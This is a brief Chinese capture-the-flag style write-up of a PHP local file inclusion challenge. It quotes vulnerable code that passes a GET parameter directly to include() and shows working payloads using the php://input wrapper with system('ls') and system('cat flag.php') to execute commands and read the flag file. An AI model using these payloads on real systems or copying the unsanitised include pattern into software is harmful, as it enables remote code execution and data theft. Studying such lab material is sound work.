1. 代码审计

      <?php
      if(isset($_GET['file'])){
      $file = $_GET['file'];
      include($file);
      //文件包含漏洞
      }else{
      highlight_file(__FILE__);
      }
      
    2. 利用php://input伪协议读取数据

    ?file=php://input
    
    #POST数据
    <?php system('ls');?>
    <?php system('cat flag.php');?>
    

    image-20210608212022359.png